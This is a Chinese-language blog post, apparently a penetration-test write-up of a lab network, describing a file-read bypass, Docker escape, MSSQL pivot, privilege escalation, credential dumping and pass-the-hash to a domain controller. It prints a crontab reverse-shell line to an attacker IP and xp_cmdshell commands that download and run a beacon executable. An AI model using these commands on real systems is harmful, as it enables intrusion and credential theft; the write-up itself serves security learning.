<!DOCTYPE html>

<html lang="en">

<head>
    
    <title>一次内网渗透测试 - Hexo</title>
    <meta charset="UTF-8">
    <meta name="keywords" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
    
    <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />
    <meta name="description" content="外网跳板http:&#x2F;&#x2F;192.168.34.244&#x2F;  不能用http，能用file，但是过滤了www等，看不了index.php，可以用url编码绕过还可以用&#x2F;proc&#x2F;self&#x2F;cwd Linux proc &#x2F;proc是一种伪文件系统（也即虚拟文件系统），存储的是当前内核运行状态的一系列特殊文件，用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息，甚至可以通过更改其中某些文">
<meta property="og:type" content="article">
<meta property="og:title" content="一次内网渗透测试">
<meta property="og:url" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="外网跳板http:&#x2F;&#x2F;192.168.34.244&#x2F;  不能用http，能用file，但是过滤了www等，看不了index.php，可以用url编码绕过还可以用&#x2F;proc&#x2F;self&#x2F;cwd Linux proc &#x2F;proc是一种伪文件系统（也即虚拟文件系统），存储的是当前内核运行状态的一系列特殊文件，用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息，甚至可以通过更改其中某些文">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/1.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/2.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/3.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/4.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/5.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/6.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/7.png">
<meta property="og:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/8.png">
<meta property="article:published_time" content="2022-07-16T12:02:14.000Z">
<meta property="article:modified_time" content="2023-09-20T15:44:06.167Z">
<meta property="article:author" content="r1ngs">
<meta property="article:tag" content="内网渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://0xr1ngs.github.io/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/1.png">
    
<link rel="stylesheet" href="/lib/fancybox/fancybox.css">
<link rel="stylesheet" href="/lib/mdui_043tiny/mdui.css">


    <link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1695315378810">
    
    <link rel="stylesheet" href="/css/style.css?v=1695315378811">

    
        
            <link rel="stylesheet" href="/custom.css?v=1695315378811">
        
    

    
<script src="/lib/mdui_043tiny/mdui.js" async></script>
<script src="/lib/fancybox/fancybox.umd.js" async></script>


    <script async src="/js/app.js?v=1695315378811"></script>
    
     

    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4D4ZJ9G024"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag("js", new Date());

  gtag("config", "G-4D4ZJ9G024");
</script>

<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-one-dark.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>

<body class="mdui-drawer-body-left">
    <div id="nexmoe-background">
        <div class="nexmoe-bg" 
            style="background-image: url(/images/7.jpg)"
        ></div>
        <div class="mdui-appbar mdui-shadow-0">
            <div class="mdui-toolbar">
                <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
                <div class="mdui-toolbar-spacer"></div>
                <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
                <a href="/" title="r1ngs" class="mdui-btn mdui-btn-icon"><img src="/images/avator.jpg" alt="r1ngs"></a>
            </div>
        </div>
    </div>
    <div id="nexmoe-header">
        <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="r1ngs">
            <img src="/images/avator.jpg" alt="r1ngs" alt="r1ngs">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>15</div>
        <div><span>Tags</span>9</div>
        <div><span>Categories</span>3</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archive.html" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
        
            
            <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
         
            <form id="search_form" action_e="" onsubmit="return search();">
                <label><input id="search_value" name="q" type="search" placeholder="Search"></label>
            </form>
         
    </div>
</div>




        
            
            <div class="nexmoe-widget-wrap">
	<div class="nexmoe-widget nexmoe-social">
		<a
			class="mdui-ripple"
			href="https://github.com/0xr1ngs/"
			target="_blank"
			mdui-tooltip="{content: 'GitHub'}"
			style="
				color: rgb(25, 23, 23);
				background-color: rgba(25, 23, 23, .1);
			"
		>
			<i
				class="nexmoefont icon-github"
			></i> </a
		>
	</div>
</div>

        
            
            
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Categories</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/CTF/">CTF</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Crypto/">Crypto</a>
          <span class="category-list-count">5</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Web/">Web</a>
          <span class="category-list-count">9</span>
        </li>

        
      </ul>

    </div>
  </div>


        
            
            
  <div class="nexmoe-widget-wrap">
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/Java/" style="font-size: 20px;">Java</a> <a href="/tags/cbc/" style="font-size: 10px;">cbc</a> <a href="/tags/csrf/" style="font-size: 10px;">csrf</a> <a href="/tags/sqli/" style="font-size: 20px;">sqli</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/xxe/" style="font-size: 10px;">xxe</a> <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 10px;">内网渗透</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 10px;">文件上传</a> <a href="/tags/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/" style="font-size: 20px;">未授权访问</a>
    </div>
    
      <script>
        var maxTagcloud = parseInt(17);
        var tags_length = parseInt(9);
        var tags_arr = [];
        for(var i = 0; i < tags_length; i++){
          tags_arr.push(i);
        }
        tags_arr.sort(function (l, r) {
          return Math.random() > 0.5 ? -1 : 1;
        });
        tags_arr = tags_arr.slice(0, maxTagcloud < tags_length ? tags_length - maxTagcloud : 0);
        for(var tag_i = 0; tag_i < tags_arr.length; tag_i++){
          document.getElementById("randomtagcloud").children[tags_arr[tag_i]].style.display = 'none';
        }
      </script>
    
  </div>

        
            
            
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/">2023</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/">2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/">2019</a><span class="archive-list-count">7</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/">2018</a><span class="archive-list-count">6</span></li></ul>
    </div>
  </div>



        
            
            
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Recent Posts</h3>
    <div class="nexmoe-widget">
      <ul>
        
          <li>
            <a href="/2023/06/19/Java-Jndi/">Jndi注入</a>
          </li>
        
          <li>
            <a href="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">一次内网渗透测试</a>
          </li>
        
          <li>
            <a href="/2019/12/12/redis/">redis未授权访问</a>
          </li>
        
          <li>
            <a href="/2019/12/12/php-fpm/">php-fpm</a>
          </li>
        
          <li>
            <a href="/2019/11/15/%E8%A7%A3n%E6%AC%A1%E5%90%8C%E4%BD%99%E6%96%B9%E7%A8%8B/">解n次同余方程</a>
          </li>
        
      </ul>
    </div>
  </div>

        
    </aside>
    <div class="nexmoe-copyright">
        &copy; 2023 r1ngs
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        
    </div>
</div><!-- .nexmoe-drawer -->
    </div>
    <div id="nexmoe-content">
        <div class="nexmoe-primary">
    <div class="nexmoe-post">
  <article>
    
        <div class="nexmoe-post-cover absolute" style="padding-top: 31.575123152709356%;"> 
            <img src="/2022/07/16/LGP-内网渗透/6.png" alt="一次内网渗透测试" loading="lazy">
            <h1>一次内网渗透测试</h1>
        </div>
    
    
    <div class="nexmoe-post-meta">
    <div class="nexmoe-rainbow">
        <a class="nexmoefont icon-calendar-fill">2022年07月16日</a>
        
            <a class="nexmoefont icon-appstore-fill -link" href="/categories/Web/">Web</a>
        
        
    </div>
    
    
    
    
    
</div>

    <h1 id="外网跳板"><a href="#外网跳板" class="headerlink" title="外网跳板"></a>外网跳板</h1><p><a target="_blank" rel="noopener" href="http://192.168.34.244/">http://192.168.34.244/</a></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/1.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<p>不能用http，能用file，但是过滤了www等，看不了index.php，可以用url编码绕过还可以用<code>/proc/self/cwd</code></p>
<h3 id="Linux-proc"><a href="#Linux-proc" class="headerlink" title="Linux proc"></a>Linux proc</h3><blockquote>
<p>&#x2F;proc是一种伪文件系统（也即虚拟文件系统），存储的是当前内核运行状态的一系列特殊文件，用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息，甚至可以通过更改其中某些文件来改变内核的运行状态。</p>
</blockquote>
<p><code>/proc/self/cwd</code>是一个软连接，指向用户目录，如果是web用户就指向web目录，也可以用来绕过，还比如<code>/proc/net/arp</code></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/cute/archive/2011/04/20/2022280.html">深入理解linux系统下proc文件系统内容 - zhezhelin - 博客园</a></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/2.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<p>可以看<code>/etc/hosts</code></p>
<p>这台的ip是172.17.0.2，arp还能看到一个.0.1</p>
<p>web目录留了一个phpshell和root密码，可以直接查找匹配&#x2F;etc文件夹下的所有文件<code>grep -rn &quot;root&quot; *</code></p>
<p>在蚁剑的shell里面不能<code>su root</code>,这样没法输密码，直接就会返回<code>Password: su: Authentication failure</code></p>
<p>可以弹一个<code>meterpreter</code>，在<code>meterpreter</code>里进入shell，然后用<code>su root</code>，然后再以root权限执行<code>shell.elf</code>,这样就可以获得一个root的<code>meterpreter</code></p>
<h2 id="docker-逃逸"><a href="#docker-逃逸" class="headerlink" title="docker 逃逸"></a>docker 逃逸</h2><p>特权模式挂载用户目录</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">fdisk</span> -l
<span class="token function">mkdir</span> /test
<span class="token function">mount</span> /dev/sda1 /test
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这样相当于把宿主机的根目录挂载到了<code>/test</code> 可以通过<code>test</code>进行文件读写。</p>
<p>但是不能直接去<code>test</code>目录执行<code>/bin/bash</code> 只能通过写入<code>ssh key</code>或者<code>crontab</code>的形式</p>
<p>但是注意，不能直接把反弹shell的命令写到任务里，而是应该写入一个sh文件</p>
<pre class="line-numbers language-bash"><code class="language-bash">*/1 * * * * /bin/bash -i <span class="token operator">></span><span class="token operator">&amp;</span> /dev/tcp/192.168.33.116/12501 0<span class="token operator">></span><span class="token operator">&amp;</span>1 ❌
*/1 * * * * root <span class="token function">bash</span> /tmp/shell.sh ✅
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>原因：</p>
<p><a target="_blank" rel="noopener" href="https://m3lon.github.io/2019/03/18/%E8%A7%A3%E5%86%B3ubuntu-crontab%E5%8F%8D%E5%BC%B9shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E9%97%AE%E9%A2%98/">解决ubuntu crontab反弹shell失败的问题</a></p>
<p>简单来说就是<code>centos</code>里面的<code>cron</code>中执行的<code>shell</code>环境是<code>/bin/sh</code>，<code>ubuntu</code>中<code>/bin/sh</code>这个软连接指向了<code>dash</code> 。但是不执行<code>dash</code>直接执行<code>/test/bin/bash</code>也是不行的。因为没有用<code>chroot</code>切换<code>/test</code>为根目录，而且弹过来的也不是宿主机的<code>shell</code>，因为这样相当于在原来基础上只是加了一个<code>/bin/bash</code>而已。</p>
<p>同时，如果前面的crontab任务有错，后面的应该也是不执行的，比如前一句忘了写执行的用户</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/3.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<h3 id="etc-crontab-和-var-spool-cron区别："><a href="#etc-crontab-和-var-spool-cron区别：" class="headerlink" title="/etc/crontab 和 /var/spool/cron区别："></a><code>/etc/crontab</code> 和 <code>/var/spool/cron</code>区别：</h3><p><code>/var/spool/cron/</code>这个目录是以账号来区分每个用户自己的执行计划，而<code>/etc/crontab</code>系统执行计划，需要在五个*后面加上用户，比如上面没有写到<code>/etc/crontab</code>没有加root就是错误的</p>
<p>然后现在通过反弹的shell再弹<code>meterpreter</code>就有宿主机shell了</p>
<h1 id="内网移动"><a href="#内网移动" class="headerlink" title="内网移动"></a>内网移动</h1><h2 id="mssql"><a href="#mssql" class="headerlink" title="mssql"></a>mssql</h2><pre class="line-numbers language-bash"><code class="language-bash"><span class="token punctuation">[</span>+<span class="token punctuation">]</span> NetInfo:
<span class="token punctuation">[</span>*<span class="token punctuation">]</span>172.16.2.4
   <span class="token punctuation">[</span>-<span class="token operator">></span><span class="token punctuation">]</span>MSSQL
   <span class="token punctuation">[</span>-<span class="token operator">></span><span class="token punctuation">]</span>172.16.2.4
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> NetInfo:
<span class="token punctuation">[</span>*<span class="token punctuation">]</span>172.16.2.2
   <span class="token punctuation">[</span>-<span class="token operator">></span><span class="token punctuation">]</span>outx-rivate-PC
   <span class="token punctuation">[</span>-<span class="token operator">></span><span class="token punctuation">]</span>172.16.2.2
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> NetInfo:
<span class="token punctuation">[</span>*<span class="token punctuation">]</span>172.16.2.1
   <span class="token punctuation">[</span>-<span class="token operator">></span><span class="token punctuation">]</span>DC
   <span class="token punctuation">[</span>-<span class="token operator">></span><span class="token punctuation">]</span>172.16.2.1
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 172.16.2.1	MS17-010	<span class="token punctuation">(</span>Windows Server 2012 R2 Datacenter 9600<span class="token punctuation">)</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> 172.16.2.2	MS17-010	<span class="token punctuation">(</span>Windows 7 Professional 7601 Service Pack 1<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>不拿17-010打了，打<code>mssql</code> ，密码在web配置文件里有，但是这台mssql只连通<code>172.16.2.0</code>网段，要反弹回来的话只能在跳板机做一个端口转发，跳板机做server，攻击机做client，payload反弹到server的<code>12001</code>端口相当于反弹到了client的<code>12001</code>端口，<code>listener</code>这样设置</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/4.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<p><code>172.16.2.12</code>就是跳板机的一个网卡ip，另一个是192.168.34.244。攻击机的<code>frpc.ini</code> 配置为</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token punctuation">[</span>common<span class="token punctuation">]</span>
tls_enable <span class="token operator">=</span> <span class="token boolean">true</span>
token <span class="token operator">=</span> qax_scu
server_addr <span class="token operator">=</span> 192.168.34.244
server_port <span class="token operator">=</span> 7200

<span class="token punctuation">[</span>http_proxy<span class="token punctuation">]</span>
<span class="token function">type</span> <span class="token operator">=</span> tcp
remote_port <span class="token operator">=</span>12001
plugin<span class="token operator">=</span>http_proxy
local_port <span class="token operator">=</span>12001
local_ip <span class="token operator">=</span>127.0.0.1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后不能用cs直接通过listener生成payload，然后mssql_exec执行，因为经过排查后发现这样生成的payload根本没有走http流量，可能是个cs的bug，所以只能生成exe文件然后下载执行。</p>
<p><strong>其次，msf的mssql_exec模块如果返回有中文字符会直接报错，建议直接用navicat</strong></p>
<p>跳板机有python3，起一个http.server就可以，然后下载到progamdata执行</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">exec</span> master<span class="token punctuation">..</span>xp_cmdshell <span class="token string">"powershell Invoke-WebRequest http://172.16.2.12:12345/beacon.exe -OutFile C://programdata/beacon.exe"</span>
<span class="token function">exec</span> master<span class="token punctuation">..</span>xp_cmdshell <span class="token string">"C://programdata/beacon.exe"</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>mssql是<code>nt/service</code>权限，用<code>ms16-075</code>一键提权，弹回新的shell，然后hashdump和mimikatz</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/5.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<p>hashdump返回的结果格式为：</p>
<p><code>Username:RID:LM-HASH:NTLM-HASH</code></p>
<p><a target="_blank" rel="noopener" href="https://www.cmd5.com/">cmd5</a>支持NTLM解密</p>
<h2 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h2><p>window vista之后没办法使用RID非500的本地管理员用户来进行Pass The Hash, 但是如果是域用户且该域用户属于本地Administrators组的成员也可以进行pass the hash</p>
<h3 id="CS攻击"><a href="#CS攻击" class="headerlink" title="CS攻击"></a>CS攻击</h3><p>在cs里，视图⇒目标⇒添加目标，添加DC，输入ip地址，然后psexec</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/6.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/7.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>
<p>直接就上线了，PC机也可以这么做</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/2022/07/16/LGP-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/8.png" alt="Untitled" data-caption="Untitled" loading="lazy"></p>

    
  </article>

  
      

  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
   
    
        <a class="nexmoefont icon-tag-fill -none-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a>
    
</div>
  
  
    <script async src="/js/copy-codeblock.js?v=1695315378772"></script>
  

  
      <div class="nexmoe-post-footer">
          
      </div>
  
</div>
</div>
        <div class="nexmoe-post-right">
              <div class="nexmoe-fixed">
                  <div class="nexmoe-tool"> 
                    
                      
                        
                          
                          
                              <button class="mdui-fab catalog" style="overflow:unset;">
                                  <i class="nexmoefont icon-i-catalog"></i>
                                  <div class="nexmoe-toc">
                                      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A4%96%E7%BD%91%E8%B7%B3%E6%9D%BF"><span class="toc-number">1.</span> <span class="toc-text">外网跳板</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux-proc"><span class="toc-number">1.0.1.</span> <span class="toc-text">Linux proc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#docker-%E9%80%83%E9%80%B8"><span class="toc-number">1.1.</span> <span class="toc-text">docker 逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#etc-crontab-%E5%92%8C-var-spool-cron%E5%8C%BA%E5%88%AB%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">&#x2F;etc&#x2F;crontab 和 &#x2F;var&#x2F;spool&#x2F;cron区别：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">2.</span> <span class="toc-text">内网移动</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#mssql"><span class="toc-number">2.1.</span> <span class="toc-text">mssql</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">2.1.1.</span> <span class="toc-text">提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PTH"><span class="toc-number">2.2.</span> <span class="toc-text">PTH</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CS%E6%94%BB%E5%87%BB"><span class="toc-number">2.2.1.</span> <span class="toc-text">CS攻击</span></a></li></ol></li></ol></li></ol>
                                  </div>
                              </button>
                          
                          
                      
                    
                      <a href="#nexmoe-content" class="toc-link" aria-label="Back To Top" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
                  </div>
              </div>
            </div>
    </div>
    <div id="nexmoe-search-space">
	<div class="search-container">
		<div class="search-header">
			<div class="search-input-container">
				<input
					class="search-input"
					type="text"
					placeholder="Search"
					oninput="sinput();"
				/>
			</div>
			<a class="search-close" onclick="sclose();">×</a>
		</div>
		<div class="search-body"></div>
	</div>
</div>

    
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2058306854838448" crossorigin="anonymous"></script>

</body>

</html>
